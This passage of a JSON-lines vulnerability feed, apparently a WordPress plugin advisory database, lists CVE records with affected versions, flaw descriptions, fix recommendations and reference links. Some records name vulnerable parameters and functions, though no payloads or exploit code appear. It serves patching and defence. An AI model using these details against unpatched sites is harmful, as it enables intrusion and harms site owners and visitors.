or-woocommerce%2Ftrunk&old=2983681%40advanced-local-pickup-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5137","slug":"simply-excerpts","versionImpact":"1.4","versionEndExcluding":"1.6","description":"The Simply Excerpts WordPress plugin through 1.4 does not sanitize and escape some fields in the plugin settings, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79b79e9c-ea4f-4188-a1b5-61dda0b5d434\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79b79e9c-ea4f-4188-a1b5-61dda0b5d434\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36838","slug":"facebook-messenger-customer-chat","versionEndExcluding":"1.6","description":"The Facebook Chat Plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wp_ajax_update_options function in versions up to, and including, 1.5. This flaw makes it possible for low-level authenticated attackers to connect their own Facebook Messenger account to any site running the vulnerable plugin and engage in chats with site visitors on affected sites.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36ae4183-5fa7-484c-b858-5df10ae3d3f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36ae4183-5fa7-484c-b858-5df10ae3d3f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/08\\\/the-official-facebook-chat-plugin-created-vector-for-social-engineering-attacks\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/08\\\/the-official-facebook-chat-plugin-created-vector-for-social-engineering-attacks\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12441","slug":"bp-email-assign-templates","versionImpact":"1.5","versionEndExcluding":"1.6","description":"The BP Email Assign Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-email-assign-templates\\\/trunk\\\/pp-email-templates-admin.php#L297\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-email-assign-templates\\\/trunk\\\/pp-email-templates-admin.php#L297\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da81eb8b-4b38-462d-a85b-c0bad39f61a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da81eb8b-4b38-462d-a85b-c0bad39f61a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10621","slug":"simple-google-maps-short-code","versionImpact":"1.5.4","versionEndExcluding":"1.6","description":"The Simple Shortcode for Google Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pw_map shortcode in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33146b95-d2c7-433d-a104-5762b251f8ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33146b95-d2c7-433d-a104-5762b251f8ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3181804%40simple-google-maps-short-code%2Ftrunk&old=3065630%40simple-google-maps-short-code%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3181804%40simple-google-maps-short-code%2Ftrunk&old=3065630%40simple-google-maps-short-code%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11419","slug":"password-for-wp","versionImpact":"1.5","versionEndExcluding":"1.6","description":"The Password for WP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the get3_init_admin_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-for-wp\\\/trunk\\\/get3-password-wp.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-for-wp\\\/trunk\\\/get3-password-wp.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a5eb090-2dfb-4b30-bfc6-38061b94b87a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a5eb090-2dfb-4b30-bfc6-38061b94b87a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9237","slug":"fish-and-ships","versionImpact":"1.5.9","versionEndExcluding":"1.6","description":"The Fish and Ships \u2013 Most flexible shipping table rate. A WooCommerce shipping rate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceaf64d6-9872-4572-807e-7fce76edee57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceaf64d6-9872-4572-807e-7fce76edee57?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L226\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L226\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L479\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L479\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fish-and-ships\\\/tags\\\/1.5.9\\\/includes\\\/wizard.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161229%40fish-and-ships&new=3161229%40fish-and-ships&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161229%40fish-and-ships&new=3161229%40fish-and-ships&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0423","slug":"wp-s3","versionEndExcluding":"1.6","description":"The WordPress Amazon S3 Plugin WordPress plugin before 1.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73d588d7-26ae-42e2-8282-aa02bcb109b6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73d588d7-26ae-42e2-8282-aa02bcb109b6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4403","slug":"remove-schema","versionImpact":"1.5","versionEndExcluding":"1.6","description":"The Remove Schema plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the validate() function. This makes it possible for unauthenticated attackers to modify the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89635463-966d-4f7d-995d-ad83a502d95b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89635463-966d-4f7d-995d-ad83a502d95b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548575%40remove-schema&new=2548575%40remove-schema&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548575%40remove-schema&new=2548575%40remove-schema&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1723","slug":"so-widgets-bundle","versionImpact":"1.58.7","versionEndExcluding":"1.58.8","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.58.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Affected parameters include: $instance['fonts']['title_options']['tag'], $headline_tag, $sub_headline_tag, $feature['icon'].","recommendation":"Update to version 1.58.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e63c566d-744b-42f5-9ba6-9007cc60313a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.6\\\/widgets\\\/features\\\/tpl\\\/default.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.6\\\/widgets\\\/features\\\/tpl\\\/default.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044174%40so-widgets-bundle%2Ftrunk&old=3040814%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0961","slug":"so-widgets-bundle","versionImpact":"1.58.1","versionEndExcluding":"1.58.2","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.58.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/widgets\\\/button\\\/button.php#L355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/widgets\\\/button\\\/button.php#L355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36707","slug":"nifty-coming-soon-and-under-construction-page","versionEndExcluding":"1.58","description":"The Coming Soon & Maintenance Mode Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.57. This is due to confusing logic functions missing or having incorrect nonce validation. This makes it possible for unauthenticated attackers to gain and perform otherwise unauthorized access and actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/jetpack.com\\\/features\\\/security\\\/library\\\/nifty-coming-soon-and-under-construction-page-plugin\\\/\",\"name\":\"https:\\\/\\\/jetpack.com\\\/features\\\/security\\\/library\\\/nifty-coming-soon-and-under-construction-page-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59278214-b0ce-44bf-8d8f-265c5c50006a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59278214-b0ce-44bf-8d8f-265c5c50006a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-coming-soon-maintenance-mode-page-cross-site-request-forgery-1-57\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-coming-soon-maintenance-mode-page-cross-site-request-forgery-1-57\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa47a464-af97-43bc-b6cb-75a08ce3ece7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa47a464-af97-43bc-b6cb-75a08ce3ece7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36752","slug":"nifty-coming-soon-and-under-construction-page","versionImpact":"1.57","versionEndExcluding":"1.58","description":"The Coming Soon & Maintenance Mode Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.57. This is due to missing or incorrect nonce validation on the save_meta_box() function. This makes it possible for unauthenticated attackers to save meta boxes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.58, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368978%40nifty-coming-soon-and-under-construction-page&new=2368978%40nifty-coming-soon-and-under-construction-page&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368978%40nifty-coming-soon-and-under-construction-page&new=2368978%40nifty-coming-soon-and-under-construction-page&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d283527a-a955-4f82-9827-81a71158d8e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d283527a-a955-4f82-9827-81a71158d8e2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13463","slug":"seatreg","versionImpact":"1.56.0","versionEndExcluding":"1.56.1","description":"The SeatReg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'seatreg' shortcode in all versions up to, and including, 1.56.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.56.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227873%40seatreg&new=3227873%40seatreg&sfp_email=&sfph_mail=#file1224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227873%40seatreg&new=3227873%40seatreg&sfp_email=&sfph_mail=#file1224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/769bc1fa-4f41-431e-9907-6e03d2c921be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/769bc1fa-4f41-431e-9907-6e03d2c921be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2290","slug":"advanced-ads","versionImpact":"1.52.1","versionEndExcluding":"1.52.2","description":"The Advanced Ads plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.52.1 via deserialization of untrusted input in the 'placement_slug' parameter. This makes it possible for authenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.52.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/trunk\\\/modules\\\/import-export\\\/classes\\\/import.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/trunk\\\/modules\\\/import-export\\\/classes\\\/import.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f64336f7-ab2a-4e22-a76f-d077c51f9c57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f64336f7-ab2a-4e22-a76f-d077c51f9c57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3952","slug":"advanced-ads","versionImpact":"1.52.1","versionEndExcluding":"1.52.2","description":"The Advanced Ads \u2013\u00a0Ad Manager & AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Ad widget in all versions up to, and including, 1.52.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.52.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea634b5-72db-428c-96b4-15ef6025ab1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea634b5-72db-428c-96b4-15ef6025ab1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/tags\\\/1.52.1\\\/modules\\\/gutenberg\\\/includes\\\/class-gutenberg.php#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/tags\\\/1.52.1\\\/modules\\\/gutenberg\\\/includes\\\/class-gutenberg.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4679","slug":"wufoo-shortcode","versionEndExcluding":"1.52","description":"The Wufoo Shortcode WordPress plugin before 1.52 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c817c4af-cff2-4720-944d-c59e27544d41\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c817c4af-cff2-4720-944d-c59e27544d41\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4652","slug":"broadstreet","versionImpact":"1.51.7","versionEndExcluding":"1.51.8","description":"The Broadstreet WordPress plugin before 1.51.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 1.51.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a18ab96-ba95-4599-824f-df12e4851e6d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a18ab96-ba95-4599-824f-df12e4851e6d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6295","slug":"so-widgets-bundle","versionImpact":"1.50.1","versionEndExcluding":"1.51.0","description":"The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function\/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.","recommendation":"Update to version 1.51.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc9ed9f-55b4-43a9-a79d-c7120764f47c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc9ed9f-55b4-43a9-a79d-c7120764f47c\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7232","slug":"wp-backitup","versionImpact":"1.45","versionEndExcluding":"1.50","description":"The Backup and Restore WordPress  WordPress plugin through 1.45 does not protect some log files containing sensitive information such as site configuration etc, allowing unauthenticated users to access such data","recommendation":"Update to version 1.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/323fef8a-aa17-4698-9a02-c12d1d390763\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/323fef8a-aa17-4698-9a02-c12d1d390763\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
